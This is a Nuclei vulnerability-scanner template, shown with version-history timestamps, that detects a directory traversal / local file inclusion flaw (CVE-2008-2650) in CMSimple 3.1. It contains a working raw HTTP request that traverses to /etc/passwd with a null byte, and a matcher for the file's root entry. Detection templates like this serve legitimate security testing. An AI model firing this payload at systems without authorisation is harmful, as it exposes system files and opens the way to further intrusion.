nuclei-templates/cves/2008/CVE-2008-2650.yaml

26 lines
1007 B
YAML
Raw Normal View History

2021-03-02 07:48:13 +00:00
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
2021-04-22 08:59:05 +00:00
description: |
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
2021-03-02 07:48:13 +00:00
reference: https://www.exploit-db.com/exploits/5700
tags: cve,cve2008,lfi
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
2021-03-10 09:18:54 +00:00
Host: {{Hostname}}
2021-03-02 07:48:13 +00:00
Content-Type: application/x-www-form-urlencoded
2021-03-02 08:32:36 +00:00
matchers-condition: and
2021-03-02 07:48:13 +00:00
matchers:
- type: status
status:
- 200
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-03-02 08:04:01 +00:00
part: body